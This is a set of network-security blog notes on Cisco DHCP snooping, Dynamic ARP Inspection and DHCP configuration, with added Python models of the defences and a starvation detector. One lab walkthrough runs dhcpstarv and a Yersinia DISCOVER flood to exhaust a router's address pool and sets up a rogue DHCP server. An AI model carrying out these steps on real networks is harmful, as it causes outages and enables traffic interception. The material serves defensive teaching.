Switch(config)#ip dhcp relay address 10.1.1.100
Switch(config)#ip dhcp relay enable
Switch(config)#interface vlan 10
Switch(config-if)#ip dhcp relay enable
Switch(config-if)#end
19 September, 2014
30 July, 2014
DHCP Snooping
# Attack Scenario
DHCP Snooping
- Enable on Switch
- Enable on VLAN
- ID Trusted Ports
SW2#conf terminal
! Enable the feature
SW2(config)#ip dhcp snooping
! Set directory to save database
SW2(config)#ip dhcp snooping database flash:/snoopy.db
! Enable the feature for VLAN
SW2(config)#ip dhcp snooping vlan 123
! Configure Trust port (DHCP Server)
SW2(config)#interface fas 0/3
SW2(config-if)#description trunk leading to real DHCP server
SW2(config-if)#ip dhcp snooping trust
* Note: accepts OFFERS and ACKs
* Note: If the DHCP server is itself an IOS router, it must also be told to trust relayed packets that carry option 82 with giaddr 0.0.0.0 (by default an IOS DHCP server drops them), using the global form of the command:
Router(config)# ip dhcp relay information trust-all
! Configure user ports
SW2(config)#interface fas 0/1
SW2(config-if)#description user port
SW2(config-if)#ip dhcp snooping limit rate 10
* Note: 10 pps (packets per second)
SW2(config-if)#switchport port-security
SW2(config-if)#switchport port-security maximum 5
SW2#show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
123
DHCP snooping is operational on following VLANs:
123
DHCP snooping is configured on the following L3 Interfaces:
Insertion of option 82 is enabled
circuit-id format: vlan-mod-port
remote-id format: MAC
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Verification of giaddr field is enabled
DHCP snooping trust/rate is configured on the following Interfaces:
Interface                  Trusted    Rate limit (pps)
-----------------------    -------    ----------------
FastEthernet0/1            no         10
FastEthernet0/3            yes        unlimited
SW2#show ip dhcp snooping binding
MacAddress          IpAddress        Lease(sec)  Type           VLAN  Interface
------------------  ---------------  ----------  -------------  ----  --------------------
00:0C:29:16:57:AC   10.123.0.3       85971       dhcp-snooping  123   FastEthernet0/2
Total number of bindings: 1
16 November, 2013
DHCP Snooping
Configure DHCP Snooping For VLAN 101: (Global Configuration)
configure terminal
no ip dhcp snooping information option
ip dhcp snooping
ip dhcp snooping vlan 101
Configure Trunk Ports: (Trunk Ports Connected To DHCP. DHCP Offers Are Permitted)
interface range fastEthernet 0/7-8
ip dhcp snooping trust
Configure Access Port Limits: (User Port)
interface fastEthernet 0/1
ip dhcp snooping limit rate 5 (limit of 5 DHCP packets per second)
Configure Errdisable:
errdisable detect cause dhcp-rate-limit
errdisable recovery cause dhcp-rate-limit
errdisable recovery interval 30
Configure Dynamic ARP Inspection DAI: (Global Configuration)
configure terminal
ip arp inspection vlan 101
ip arp inspection log-buffer entries 1024
ip arp inspection log-buffer logs 1024 interval 10
Configure Trunk Ports: (Trust Ports)
interface range fastEthernet 0/7-8
ip arp inspection trust
Commands to verify the configuration:
show ip dhcp snooping
debug ip dhcp snooping event
show log
show errdisable
DHCP Snooping is a security feature capable of intercepting DHCP messages crossing a switch and blocking bogus DHCP offers. DHCP Snooping uses the concept of trusted and untrusted ports. Typically, the trusted ports are used to reach DHCP servers or relay agents, while untrusted ports are used to connect to clients.
Dynamic ARP Inspection (DAI) is a security feature that helps prevent ARP poisoning and other ARP-based attacks by intercepting all ARP requests and responses, and by verifying their authenticity before updating the switch's local ARP cache or forwarding the packets to the intended destinations.
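The trusted/untrusted logic described in the two paragraphs above, together with the rate limit, the option 82 and giaddr checks, and the port-security maximum from the configurations earlier in this post, as an added Python model. This is illustration code written for this page, not from the original post and not Cisco code: the class and function names (`SnoopingSwitch`, `DhcpFrame`, `demo`), the port names, the server and rogue MAC addresses and the order in which the checks run are assumptions; the client MAC is the one from the binding table shown above.

```python
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, Set, Tuple

SERVER_MSGS = {"OFFER", "ACK", "NAK"}   # legitimate only from the server/relay side

@dataclass
class DhcpFrame:
    port: str
    src_mac: str              # Ethernet source address
    chaddr: str               # client hardware address inside the DHCP payload
    msg_type: str
    giaddr: str = "0.0.0.0"   # relay agent address; must be 0.0.0.0 from a client
    option82: bool = False    # relay agent information option present?
    yiaddr: str = "0.0.0.0"   # address being assigned (OFFER/ACK only)

@dataclass
class SnoopingSwitch:
    """Toy model of 'ip dhcp snooping' plus 'ip arp inspection' on one VLAN (assumed check order)."""
    trusted: Set[str]
    rate_limit: Dict[str, int] = field(default_factory=dict)   # port -> DHCP pps
    max_macs: Dict[str, int] = field(default_factory=dict)     # port-security maximum
    bindings: Dict[str, Tuple[str, str]] = field(default_factory=dict)  # mac -> (ip, port)
    pending: Dict[str, str] = field(default_factory=dict)      # chaddr -> client port
    pps: Dict[str, int] = field(default_factory=lambda: defaultdict(int))
    macs_seen: Dict[str, Set[str]] = field(default_factory=lambda: defaultdict(set))
    errdisabled: Set[str] = field(default_factory=set)

    def new_second(self) -> None:
        """Rate limits are per second; call this when the clock ticks."""
        self.pps.clear()

    def dhcp(self, f: DhcpFrame) -> str:
        """Return 'forward' or 'drop: <reason>' for one DHCP frame."""
        mac = f.chaddr.lower()
        if f.port in self.errdisabled:
            return "drop: port err-disabled"
        if f.port in self.trusted:
            # Server side: replies pass, and an ACK creates the snooping binding
            # on the port where the client's DISCOVER/REQUEST was seen.
            if f.msg_type == "ACK" and mac in self.pending:
                self.bindings[mac] = (f.yiaddr, self.pending.pop(mac))
            return "forward"
        self.pps[f.port] += 1
        if self.pps[f.port] > self.rate_limit.get(f.port, float("inf")):
            self.errdisabled.add(f.port)       # errdisable detect cause dhcp-rate-limit
            return "drop: rate limit exceeded, port err-disabled"
        if f.msg_type in SERVER_MSGS:
            return "drop: server message on untrusted port"   # rogue DHCP server
        if f.option82:
            return "drop: option 82 on untrusted port"
        if f.giaddr != "0.0.0.0":
            return "drop: giaddr verification failed"
        if f.src_mac.lower() != mac:
            return "drop: hwaddr verification failed"         # chaddr != source MAC
        self.macs_seen[f.port].add(mac)
        if len(self.macs_seen[f.port]) > self.max_macs.get(f.port, float("inf")):
            self.errdisabled.add(f.port)       # switchport port-security violation
            return "drop: port-security maximum exceeded, port err-disabled"
        if f.msg_type in ("DISCOVER", "REQUEST"):
            self.pending[mac] = f.port         # remember which port the client is on
        return "forward"

    def arp(self, port: str, sender_mac: str, sender_ip: str) -> str:
        """DAI: on an untrusted port the ARP sender MAC/IP must match a binding."""
        if port in self.trusted:
            return "forward"
        if self.bindings.get(sender_mac.lower()) != (sender_ip, port):
            return "drop: no matching DHCP snooping binding"
        return "forward"

def demo() -> dict:
    """One client through DORA, then a rogue OFFER, a forged ARP and a DISCOVER flood."""
    sw = SnoopingSwitch(trusted={"Fa0/3"}, rate_limit={"Fa0/1": 10, "Fa0/2": 10},
                        max_macs={"Fa0/1": 5})
    client, server = "00:0c:29:16:57:ac", "00:aa:bb:cc:dd:ee"   # server MAC is constructed
    r = {}
    r["discover"] = sw.dhcp(DhcpFrame("Fa0/1", client, client, "DISCOVER"))
    r["rogue_offer"] = sw.dhcp(DhcpFrame("Fa0/2", "00:11:22:33:44:55", client, "OFFER",
                                         yiaddr="10.123.0.200"))
    r["real_offer"] = sw.dhcp(DhcpFrame("Fa0/3", server, client, "OFFER", yiaddr="10.123.0.3"))
    r["request"] = sw.dhcp(DhcpFrame("Fa0/1", client, client, "REQUEST"))
    r["ack"] = sw.dhcp(DhcpFrame("Fa0/3", server, client, "ACK", yiaddr="10.123.0.3"))
    r["binding"] = sw.bindings.get(client)
    r["arp_ok"] = sw.arp("Fa0/1", client, "10.123.0.3")
    r["arp_forged"] = sw.arp("Fa0/1", client, "10.123.0.1")     # client claims the gateway
    r["relayed"] = sw.dhcp(DhcpFrame("Fa0/1", client, client, "DISCOVER", giaddr="10.123.0.254"))
    r["bad_chaddr"] = sw.dhcp(DhcpFrame("Fa0/1", client, "00:de:ad:be:ef:01", "DISCOVER"))
    sw.new_second()         # 11 DISCOVERs from 11 different MACs inside one second on Fa0/2
    for i in range(11):
        mac = f"02:00:00:00:00:{i:02x}"
        r["flood_last"] = sw.dhcp(DhcpFrame("Fa0/2", mac, mac, "DISCOVER"))
    r["errdisabled"] = sorted(sw.errdisabled)
    return r
```

Running `demo()` shows the three effects the post's configuration is after: the OFFER arriving on a user port is dropped while the identical OFFER from the trusted uplink passes, the ARP reply that does not match the binding learned from the real ACK is dropped by DAI, and the eleventh DISCOVER inside one second on a port limited to 10 pps err-disables that port, which is what `errdisable recovery cause dhcp-rate-limit` later brings back.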
Attacks:
• STP MiTM (VLAN) attack: Yersinia, Ettercap
• STP MiTM (ISL) attack: Yersinia, Ettercap, packETH
• ARP MiTM attack: Ettercap
• MAC overflow attack: Ettercap
• DHCP consumption attack: Yersinia
• DHCP starvation attack: dhcpstarv
25 October, 2013
DHCP Starvation and Rogue DHCP Server
Download and install dhcpstarv
root@bt:~# tar xvfz dhcpstarv-0.2.1.tar.gz
root@bt:~# cd dhcpstarv-0.2.1
root@bt:dhcpstarv-0.2.1# ./configure
root@bt:dhcpstarv-0.2.1# make
root@bt:dhcpstarv-0.2.1# make install
Start Attack
root@bt:# dhcpstarv [-i Interface] [-e Exclude]
Example:
root@bt:~# dhcpstarv -v -i eth2 -e 10.0.10.2
Download DHCP Server
root@bt:~# apt-get install dhcp3-server -y
Make Backup File
root@bt:~# cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.config.backup
Set your DHCP Pool Information
root@bt:~# vi /etc/dhcp3/dhcpd.conf
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option domain-name "microsoft.com";
option broadcast-address 192.168.2.255;
option routers 192.168.2.1;
option domain-name-servers 8.8.8.8;
range 192.168.2.51 192.168.2.100;
}
Tell dhcpd which configuration file to use
root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid eth0
Start DHCP Server
root@bt:~# /etc/init.d/dhcp3-server start
10 June, 2013
DHCP Starvation Attack Using Yersinia
DHCP Starvation Attack
Configure Cisco Router as DHCP
R1(config)#ip dhcp excluded-address 192.168.1.1 192.168.1.10
R1(config)#ip dhcp pool MYPOOL
R1(dhcp-config)#default-router 192.168.1.1
R1(dhcp-config)#dns-server 192.168.1.1
R1(dhcp-config)#domain-name microsoft.com
R1(dhcp-config)#network 192.168.1.0 /24
R1(dhcp-config)#exit
Configure Interface
R1(config)#interface fastEthernet 0/0
R1(config-if)#ip address 192.168.1.1 255.255.255.0
R1(config-if)#no shutdown
Verify Configuration
R1#show ip dhcp binding
Bindings from all pools not associated with VRF:
IP address      Client-ID/              Lease expiration        Type
                Hardware address/
                User name
192.168.1.11    0108.0027.5351.11       Mar 02 2002 12:04 AM    Automatic
192.168.1.12    0102.004c.4f4f.50       Mar 02 2002 12:08 AM    Automatic
R1#show ip dhcp pool
Pool MYPOOL :
Utilization mark (high/low) : 100 / 0
Subnet size (first/next) : 0 / 0
Total addresses : 254
Leased addresses : 2
Pending event : none
1 subnet is currently in the pool :
Current index        IP address range                    Leased addresses
192.168.1.12         192.168.1.1      - 192.168.1.254    1
R1#show ip dhcp server statistics
Memory usage 24329
Address pools 1
Database agents 0
Automatic bindings 2
Manual bindings 0
Expired bindings 0
Malformed messages 0
Secure arp entries 0
Message Received
BOOTREQUEST 0
DHCPDISCOVER 2
DHCPREQUEST 2
DHCPDECLINE 0
DHCPRELEASE 0
DHCPINFORM 2
Message Sent
BOOTREPLY 0
DHCPOFFER 2
DHCPACK 4
DHCPNAK 0
We have only 2 DHCP clients.
Now start the DHCP discovery attack using Yersinia 0.7.1.
Verify Interface Configuration
root@bt:~# ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 08:00:27:9d:cb:38
          inet addr:192.168.1.2  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe9d:cb38/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1011 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2638752 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:153749 (153.7 KB)  TX bytes:753163338 (753.1 MB)
          Interrupt:10 Base address:0xd020
root@bt:~# yersinia -G
Opens the graphical interface.
Click "Launch attack".
Select "DHCP" and then "Send DISCOVER packet".
Now check the router.
Monitor and Verify Cisco Router
R1#debug ip dhcp server packet
*Mar 1 00:30:44.043: DHCPD: Sending DHCPOFFER to client b870.fe70.9c15 (192.168.1.64).
*Mar 1 00:30:44.047: DHCPD: broadcasting BOOTREPLY to client b870.fe70.9c15.
*Mar 1 00:30:44.087: DHCPD: DHCPDISCOVER received from client 33d7.f461.f513 on interface FastEthernet0/0.
*Mar 1 00:30:44.095: DHCPD: Allocate an address without class information (192.168.1.0)
R1#un all
R1#show ip dhcp pool
Pool MYPOOL :
Utilization mark (high/low) : 100 / 0
Subnet size (first/next) : 0 / 0
Total addresses : 254
Leased addresses : 244
Pending event : none
1 subnet is currently in the pool :
Current index        IP address range                    Leased addresses
0.0.0.0              192.168.1.1      - 192.168.1.254    244
R1#show ip dhcp server statistics
Memory usage 55845
Address pools 1
Database agents 0
Automatic bindings 132
Manual bindings 0
Expired bindings 124
Malformed messages 0
Secure arp entries 0
Message Received
BOOTREQUEST 0
DHCPDISCOVER 5424
DHCPREQUEST 2
DHCPDECLINE 0
DHCPRELEASE 0
DHCPINFORM 2
Message Sent
BOOTREPLY 0
DHCPOFFER 256
DHCPACK 4
DHCPNAK 0
R1#show ip dhcp binding
Bindings from all pools not associated with VRF:
IP address      Client-ID/              Lease expiration        Type
                Hardware address/
                User name
192.168.1.11    0108.0027.5351.11       Mar 02 2002 12:04 AM    Automatic
192.168.1.12    0102.004c.4f4f.50       Mar 02 2002 12:08 AM    Automatic
192.168.1.39    6909.b30f.bfae          Mar 01 2002 12:43 AM    Automatic
<Lines Omitted>
192.168.1.253   5084.9a4f.901e          Mar 01 2002 12:42 AM    Automatic
192.168.1.254   6440.0969.6d16          Mar 01 2002 12:42 AM    Automatic
All pool addresses are used.
Done!
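The router output above carries the whole starvation signature: the DHCPDISCOVER counter jumps from 2 to 5424 while DHCPREQUEST stays at 2, DHCPOFFER reaches 256, and the pool goes to 244 of 254 leased. As an added detection example (written for this page, not part of the original post), the Python below parses the kind of `debug ip dhcp server packet` lines and `show ip dhcp server statistics` / `show ip dhcp pool` snapshots shown above and flags that signature from the defender's side. The counter and pool values are the post's own; the thresholds (20 never-seen client IDs per second, 90% pool utilization, a 10:1 DISCOVER-to-REQUEST ratio), the function names and the 25 extra log lines are constructed assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Matches one DHCPDISCOVER line of "debug ip dhcp server packet", e.g.
# *Mar 1 00:30:44.087: DHCPD: DHCPDISCOVER received from client 33d7.f461.f513 on interface FastEthernet0/0.
DISCOVER_RE = re.compile(
    r"^\*(?P<date>[A-Za-z]{3}\s+\d{1,2}) (?P<time>\d\d:\d\d:\d\d)\.\d+: DHCPD: "
    r"DHCPDISCOVER received from client (?P<client>[0-9a-fA-F.]+) on interface \S+")

def discover_bursts(lines: Iterable[str], max_clients_per_sec: int = 20) -> List[Tuple[str, int]]:
    """Bucket DISCOVERs per wall-clock second and count distinct client IDs.
    Returns [(second, distinct_clients)] for every second over the threshold:
    a starvation tool announces many never-seen clients in one burst, while a
    normal boot storm rarely exceeds a few dozen per second on one interface."""
    clients_per_sec: Dict[str, set] = defaultdict(set)
    for line in lines:
        m = DISCOVER_RE.match(line.strip())
        if not m:
            continue                      # OFFER/ACK/other debug lines are ignored
        key = f"{' '.join(m['date'].split())} {m['time']}"
        clients_per_sec[key].add(m["client"].lower())
    return [(sec, len(c)) for sec, c in sorted(clients_per_sec.items())
            if len(c) > max_clients_per_sec]

def parse_counters(text: str) -> Dict[str, int]:
    """Pull the 'name  number' rows out of 'show ip dhcp server statistics'."""
    counters = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Za-z][A-Za-z ]*?)\s+(\d+)\s*$", line)
        if m:
            counters[m.group(1)] = int(m.group(2))
    return counters

def parse_pool(text: str) -> Tuple[int, int]:
    """Return (total, leased) from 'show ip dhcp pool' output."""
    total = int(re.search(r"Total addresses\s*:\s*(\d+)", text).group(1))
    leased = int(re.search(r"Leased addresses\s*:\s*(\d+)", text).group(1))
    return total, leased

def starvation_indicators(before: Dict[str, int], after: Dict[str, int],
                          pool_total: int, pool_leased: int) -> Dict[str, object]:
    """Compare two statistics snapshots. DISCOVERs that never turn into REQUESTs,
    together with a nearly exhausted pool, are the starvation signature."""
    d = {k: after.get(k, 0) - before.get(k, 0)
         for k in ("DHCPDISCOVER", "DHCPREQUEST", "DHCPOFFER")}
    utilization = pool_leased / pool_total if pool_total else 0.0
    return {"discover_delta": d["DHCPDISCOVER"], "request_delta": d["DHCPREQUEST"],
            "offer_delta": d["DHCPOFFER"], "pool_utilization": utilization,
            # thresholds are assumptions: tune them to the size of the pool being watched
            "starvation": utilization >= 0.9
                          and d["DHCPDISCOVER"] > 10 * max(d["DHCPREQUEST"], 1)}

# Counter rows copied from the post's before/after output (only the rows used here).
STATS_BEFORE = "Message Received\nDHCPDISCOVER 2\nDHCPREQUEST 2\nMessage Sent\nDHCPOFFER 2\n"
STATS_AFTER = "Message Received\nDHCPDISCOVER 5424\nDHCPREQUEST 2\nMessage Sent\nDHCPOFFER 256\n"
POOL_AFTER = "Pool MYPOOL :\nTotal addresses : 254\nLeased addresses : 244\n"
# Constructed debug log: the post's four lines plus 25 DISCOVERs from made-up
# client IDs, all inside the same second.
DEBUG_LOG = [
    "*Mar 1 00:30:44.043: DHCPD: Sending DHCPOFFER to client b870.fe70.9c15 (192.168.1.64).",
    "*Mar 1 00:30:44.047: DHCPD: broadcasting BOOTREPLY to client b870.fe70.9c15.",
    "*Mar 1 00:30:44.087: DHCPD: DHCPDISCOVER received from client 33d7.f461.f513 on interface FastEthernet0/0.",
    "*Mar 1 00:30:44.095: DHCPD: Allocate an address without class information (192.168.1.0)",
] + [f"*Mar 1 00:30:44.{100 + i:03d}: DHCPD: DHCPDISCOVER received from client "
     f"{i:04x}.0000.beef on interface FastEthernet0/0." for i in range(25)]

def run() -> dict:
    """Evaluate both detectors over the embedded samples."""
    total, leased = parse_pool(POOL_AFTER)
    return {"bursts": discover_bursts(DEBUG_LOG),
            "indicators": starvation_indicators(parse_counters(STATS_BEFORE),
                                                parse_counters(STATS_AFTER), total, leased)}

if __name__ == "__main__":
    print(run())
```

The two detectors are complementary: the per-second client count works on a live debug feed or a syslog export and fires while the flood is still running, whereas the counter comparison needs two snapshots but costs nothing on the router and also catches a slow starvation that stays under any per-second threshold. The same `utilization mark high ... log` setting shown in the "Configure DHCP On Cisco Router" post below produces the router-side syslog that the pool-utilization check reproduces here.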
##########################################################################################################
24 April, 2013
Configure DHCP On Cisco Router
Configure
configure terminal
ip dhcp excluded-address 10.1.64.1 10.1.64.9
ip dhcp excluded-address 10.1.64.201 10.1.64.255
ip dhcp pool VLAN05
default-router 10.1.64.1
dns-server 8.8.8.8 4.2.2.3
domain-name microsoft.com
option 150 ip 10.1.68.8
network 10.1.64.0 255.255.255.0
lease infinite
utilization mark high 80 log
utilization mark low 70 log
end
Note:
** utilization mark high: configures the high utilization mark of the current address pool size. The log keyword enables logging of a system message, which is generated for a DHCP pool when the pool utilization exceeds the configured high utilization threshold.
** lease {days [hours][minutes] | infinite}
** option [Number]
IANA list: http://www.iana.org/assignments/bootp-dhcp-parameters/bootp-dhcp-parameters.txt
Verify: Show Commands
#show ip dhcp pool POOL-NAME
(Displays information about DHCP address pools)
#show ip dhcp binding
(Use this command to display the IP addresses that have already been assigned)
#show ip dhcp conflict
(Displays a list of all address conflicts)
#show ip dhcp database
(Displays recent activity on the DHCP database)
#show ip dhcp server statistics
(Displays count information about server statistics and messages sent and received)
#debug ip dhcp server packet